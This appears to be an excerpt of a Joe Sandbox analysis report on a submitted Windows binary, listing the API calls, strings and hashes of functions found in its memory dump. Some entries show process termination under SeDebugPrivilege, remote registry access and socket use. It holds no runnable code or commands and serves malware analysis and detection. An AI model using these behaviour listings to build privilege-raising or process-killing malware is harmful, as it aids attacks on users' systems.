                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                • String ID:
                                                • API String ID: 793581249-0
                                                • Opcode ID: 7dfa2f12d6f8bdeceae8b8f3dc49b8d9ca29cb15233c0902f601526eac584fe7
                                                • Instruction ID: 397bb26b3fd006934091331b7d0ba7419c376d7103402766302f1c6e090ab58a
                                                • Opcode Fuzzy Hash: 7dfa2f12d6f8bdeceae8b8f3dc49b8d9ca29cb15233c0902f601526eac584fe7
                                                • Instruction Fuzzy Hash: B7511EB2A092699ADF60EBA5DD81DDE73BC9F08310B1044AAF605E3141EA7497C9CF64
                                                APIs
                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B1DAD1,00000004,00000000,00000000), ref: 00ABEAEB
                                                • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B1DAD1,00000004,00000000,00000000), ref: 00ABEB32
                                                • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B1DAD1,00000004,00000000,00000000), ref: 00B1DC86
                                                • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B1DAD1,00000004,00000000,00000000), ref: 00B1DCF2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ShowWindow
                                                • String ID:
                                                • API String ID: 1268545403-0
                                                • Opcode ID: 8f6cb4c641d1d2949e40a7ee36c9ae513aa026d45ec726e587568a9b6da9d9a7
                                                • Instruction ID: bb3dc8fbd391a89ec53df0df60d8f3574bd3bc0374420326ae49f317fc83a4ff
                                                • Opcode Fuzzy Hash: 8f6cb4c641d1d2949e40a7ee36c9ae513aa026d45ec726e587568a9b6da9d9a7
                                                • Instruction Fuzzy Hash: 0441F4702186809AD739CB288D8DFEA7AEEFB41301F598C5DE047875A3CAB4B880D751
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB26C
                                                • HeapAlloc.KERNEL32(00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB273
                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00ADAEF1,00000B00,?,?), ref: 00ADB288
                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB290
                                                • DuplicateHandle.KERNEL32(00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB293
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00ADAEF1,00000B00,?,?), ref: 00ADB2A3
                                                • GetCurrentProcess.KERNEL32(00ADAEF1,00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB2AB
                                                • DuplicateHandle.KERNEL32(00000000,?,00ADAEF1,00000B00,?,?), ref: 00ADB2AE
                                                • CreateThread.KERNEL32(00000000,00000000,00ADB2D4,00000000,00000000,00000000), ref: 00ADB2C8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                • String ID:
                                                • API String ID: 1957940570-0
                                                • Opcode ID: 319da25e65290dd1035dab12e2b960d5d9baad78e28360621fdeaf7d07491c2d
                                                • Instruction ID: 0a7eac84acfc5fee9c4bf81102994a0ffeee3c66e0f241818aec196ddd8ff460
                                                • Opcode Fuzzy Hash: 319da25e65290dd1035dab12e2b960d5d9baad78e28360621fdeaf7d07491c2d
                                                • Instruction Fuzzy Hash: 0F01BBB5240304BFE720EBA5DC49F6B7BACEB88B11F018411FA05DB1A1CA749811CB65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: NULL Pointer assignment$Not an Object type
                                                • API String ID: 0-572801152
                                                • Opcode ID: 58136a9724fc29f7efe18fc3a6575d56e1902e598ffbf7428f4406e2882afe89
                                                • Instruction ID: 6dfdae87e6b03f061da19b9d6d2d8ec2019c5d3fc6a2593473feeca3875d24f9
                                                • Opcode Fuzzy Hash: 58136a9724fc29f7efe18fc3a6575d56e1902e598ffbf7428f4406e2882afe89
                                                • Instruction Fuzzy Hash: ADE1C171A0021DABDF14DFE9CA85ABE77B5EF48764F148029FA05AB281D770AD41CB90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$_memset
                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                • API String ID: 2862541840-625585964
                                                • Opcode ID: 42e7b93fbfb7caf2e79a69769ac9f9d376494ce439186e3ca3d8aa1aba23c70c
                                                • Instruction ID: 030c0431e984e4ea4bab59fedfedec0fbc061b384ea07355aec203ec8a13fdab
                                                • Opcode Fuzzy Hash: 42e7b93fbfb7caf2e79a69769ac9f9d376494ce439186e3ca3d8aa1aba23c70c
                                                • Instruction Fuzzy Hash: 8291BF71A10219ABDF20CFE5C844FAEBBB8EF49710F108159FA15AB281CB709945CFA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00B09B19
                                                • SendMessageW.USER32(?,00001036,00000000,?), ref: 00B09B2D
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00B09B47
                                                • _wcscat.LIBCMT ref: 00B09BA2
                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 00B09BB9
                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00B09BE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window_wcscat
                                                • String ID: SysListView32
                                                • API String ID: 307300125-78025650
                                                • Opcode ID: ba9830f902b5baaf01a40aebae5541fafa676395eb41e03894df740eb03aed2a
                                                • Instruction ID: ee621b402278887149870f03d80d4c44d5db9256eeaf2534c6161ac58e7462b3
                                                • Opcode Fuzzy Hash: ba9830f902b5baaf01a40aebae5541fafa676395eb41e03894df740eb03aed2a
                                                • Instruction Fuzzy Hash: 1F419171A00308AFEB219F64DC85FEA7BE8EF08350F1049AAF545A72D2D7759D85CB60
                                                APIs
                                                  • Part of subcall function 00AE6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AE6554
                                                  • Part of subcall function 00AE6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AE6564
                                                  • Part of subcall function 00AE6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AE65F9
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B0179A
                                                • GetLastError.KERNEL32 ref: 00B017AD
                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00B017D9
                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00B01855
                                                • GetLastError.KERNEL32(00000000), ref: 00B01860
                                                • CloseHandle.KERNEL32(00000000), ref: 00B01895
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                • String ID: SeDebugPrivilege
                                                • API String ID: 2533919879-2896544425
                                                • Opcode ID: aa91f736dc416eab516d26cb25d49247b089e81059f23356f4f4544de92dc4a2
                                                • Instruction ID: f3b8fcbbe63dca165566d4b41ed65b132865bdf0c91fe7f40cd3a101074a35e7
                                                • Opcode Fuzzy Hash: aa91f736dc416eab516d26cb25d49247b089e81059f23356f4f4544de92dc4a2
                                                • Instruction Fuzzy Hash: 5741BE71600200AFDB19EF98C9D5FAEBBE5AF14710F04C499F9069F2D2DB74AA018B51
                                                APIs
                                                • LoadIconW.USER32(00000000,00007F03), ref: 00AE58B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: IconLoad
                                                • String ID: blank$info$question$stop$warning
                                                • API String ID: 2457776203-404129466
                                                • Opcode ID: b507e12b531078ef34596b8842437129c37bf9b1c232d538340ad6e380b24a74
                                                • Instruction ID: 834edcc96526d202f4ae4efe0b5be27f8ec0ebe1db5ba2f815c24e1d6d53ff5e
                                                • Opcode Fuzzy Hash: b507e12b531078ef34596b8842437129c37bf9b1c232d538340ad6e380b24a74
                                                • Instruction Fuzzy Hash: 71110D35A0D782FAE7155B76AC92EAA23EC9F15758B20007EF940F6281E770AA4056A4
                                                APIs
                                                • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00AEA806
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ArraySafeVartype
                                                • String ID:
                                                • API String ID: 1725837607-0
                                                • Opcode ID: 030916676ee38c47455695678eb6543f3bd2d8413c767a476a5f1ca6da6a2169
                                                • Instruction ID: 8ffbdb3ca38a8892669d9dd625cc16ec78fe4eb8139a7241674cd675224a9e3f
                                                • Opcode Fuzzy Hash: 030916676ee38c47455695678eb6543f3bd2d8413c767a476a5f1ca6da6a2169
                                                • Instruction Fuzzy Hash: 8BC19A75A0025ADFDB14DF99C581BEEB7F4FF18311F20806AE616E7241D734AA42CB92
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00AE6B63
                                                • LoadStringW.USER32(00000000), ref: 00AE6B6A
                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AE6B80
                                                • LoadStringW.USER32(00000000), ref: 00AE6B87
                                                • _wprintf.LIBCMT ref: 00AE6BAD
                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AE6BCB
                                                Strings
                                                • %s (%d) : ==> %s: %s %s, xrefs: 00AE6BA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                • String ID: %s (%d) : ==> %s: %s %s
                                                • API String ID: 3648134473-3128320259
                                                • Opcode ID: 2f02f3f0a9d03c463107f4ddc30ac209bb7e9d755490b58266792e08d9539981
                                                • Instruction ID: 0614936a400e5dabdbda355391f0248dca2e3ad7409ee27576d20579e164018d
                                                • Opcode Fuzzy Hash: 2f02f3f0a9d03c463107f4ddc30ac209bb7e9d755490b58266792e08d9539981
                                                • Instruction Fuzzy Hash: C80162F25002087FEB11A7909D89EE6376CEB04345F004495B746E3041EA74DE858B70
                                                APIs
                                                  • Part of subcall function 00B03C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B02BB5,?,?), ref: 00B03C1D
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B02BF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: BuffCharConnectRegistryUpper
                                                • String ID:
                                                • API String ID: 2595220575-0
                                                • Opcode ID: 1611d23cc60d01fbf37bf3756400f1bef1d326b8cfe2f2a8c9b053c6d357f160
                                                • Instruction ID: 1ac962f696f594bca6967d760364bccdf8e283a571757838a1452f79f259603a
                                                • Opcode Fuzzy Hash: 1611d23cc60d01fbf37bf3756400f1bef1d326b8cfe2f2a8c9b053c6d357f160
                                                • Instruction Fuzzy Hash: 68918C712042019FCB11EF54C999B6EBBE5FF89310F04885DF9969B2A2DB31ED09CB42
                                                APIs
                                                • select.WSOCK32 ref: 00AF9691
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF969E
                                                • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00AF96C8
                                                • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AF96E9
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00AF96F8
                                                • htons.WSOCK32(?,?,?,00000000,?), ref: 00AF97AA
                                                • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00B3DC00), ref: 00AF9765
                                                  • Part of subcall function 00ADD2FF: _strlen.LIBCMT ref: 00ADD309
                                                • _strlen.LIBCMT ref: 00AF9800
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                • String ID:
                                                • API String ID: 3480843537-0
                                                • Opcode ID: c4a035d7aa732480deedde50c6c83c020296a7a460eddad74017d16ab23a8f8f
                                                • Instruction ID: 49beb03c48d359afa975c10ef1fcf0a3a59dee5f24ba24746e3561fb7bb67577
                                                • Opcode Fuzzy Hash: c4a035d7aa732480deedde50c6c83c020296a7a460eddad74017d16ab23a8f8f
                                                • Instruction Fuzzy Hash: 4781B031504240ABD710EFA4CD85F6BB7A8EF85714F104A1DF5569B2A2EB30DD05CB92
                                                APIs
                                                • __mtinitlocknum.LIBCMT ref: 00ACA991
                                                  • Part of subcall function 00AC7D7C: __FF_MSGBANNER.LIBCMT ref: 00AC7D91
                                                  • Part of subcall function 00AC7D7C: __NMSG_WRITE.LIBCMT ref: 00AC7D98
                                                  • Part of subcall function 00AC7D7C: __malloc_crt.LIBCMT ref: 00AC7DB8
                                                • __lock.LIBCMT ref: 00ACA9A4
                                                • __lock.LIBCMT ref: 00ACA9F0
                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B56DE0,00000018,00AD5E7B,?,00000000,00000109), ref: 00ACAA0C
                                                • EnterCriticalSection.KERNEL32(8000000C,00B56DE0,00000018,00AD5E7B,?,00000000,00000109), ref: 00ACAA29
                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 00ACAA39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                • String ID:
                                                • API String ID: 1422805418-0
                                                • Opcode ID: a8cea439dc94233385271f2b637948b8df8887d7d59eb77554b5a32dd69f48a9
                                                • Instruction ID: 0145493f16d4dfef675817cc591350dd43f8ccc85ad9caeebfe6eb51c61499bd
                                                • Opcode Fuzzy Hash: a8cea439dc94233385271f2b637948b8df8887d7d59eb77554b5a32dd69f48a9
                                                • Instruction Fuzzy Hash: D2415A71A006099BEB10DF6CDA45F7CB7B0AF25378F12821CE425AB2D1DBB49C00CB82
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 00B08EE4
                                                • GetDC.USER32(00000000), ref: 00B08EEC
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B08EF7
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00B08F03
                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00B08F3F
                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00B08F50
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00B0BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00B08F8A
                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00B08FAA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                • String ID:
                                                • API String ID: 3864802216-0
                                                • Opcode ID: c11f424f0c0caabb596db7d8214ef017fb138500a3f9cbad2b66a2809fbb00c5
                                                • Instruction ID: b86a1d0d0eda2ffae341f9f8c2ad3c956bc446e2fba56562e117ebce83855c49
                                                • Opcode Fuzzy Hash: c11f424f0c0caabb596db7d8214ef017fb138500a3f9cbad2b66a2809fbb00c5
                                                • Instruction Fuzzy Hash: 93314D72100614BFEB218F60CC4AFEB3FAAEF49755F044065FE499B291DA759842CBB4
                                                APIs
                                                  • Part of subcall function 00AA936C: __swprintf.LIBCMT ref: 00AA93AB
                                                  • Part of subcall function 00AA936C: __itow.LIBCMT ref: 00AA93DF
                                                  • Part of subcall function 00ABC6F4: _wcscpy.LIBCMT ref: 00ABC717
                                                • _wcstok.LIBCMT ref: 00AF184E
                                                • _wcscpy.LIBCMT ref: 00AF18DD
                                                • _memset.LIBCMT ref: 00AF1910
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
                                                Similarity
                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                • String ID: X
                                                • API String ID: 774024439-3081909835
                                                • Opcode ID: 851edf9771a4675a1a4b6802767a1e530af3b5481390d12d862dfaa465a2f772
                                                • Instruction ID: 900b712c4cf32f49b4d8364b615ff02e41068e8abe2d9a36eb0a46c18f2809d8
                                                • Opcode Fuzzy Hash: 851edf9771a4675a1a4b6802767a1e530af3b5481390d12d862dfaa465a2f772
                                                • Instruction Fuzzy Hash: 05C17C31504344DFD724EF64CA91AAAB7E4FF86350F00496DF99A972A2DB30ED05CB92
                                                APIs
                                                  • Part of subcall function 00ABB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ABB35F
                                                • GetSystemMetrics.USER32(0000000F), ref: 00B1016D
                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00B1038D
                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00B103AB
                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00B103D6
                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00B103FF
                                                • ShowWindow.USER32(00000003,00000000), ref: 00B10421
                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00B10440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2144486728.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                • Associated: 00000000.00000002.2144466799.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B2D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144539500.0000000000B4E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144586478.0000000000B5A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2144602971.0000000000B64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_aa0000_MGQeZjDXc3.jbxd
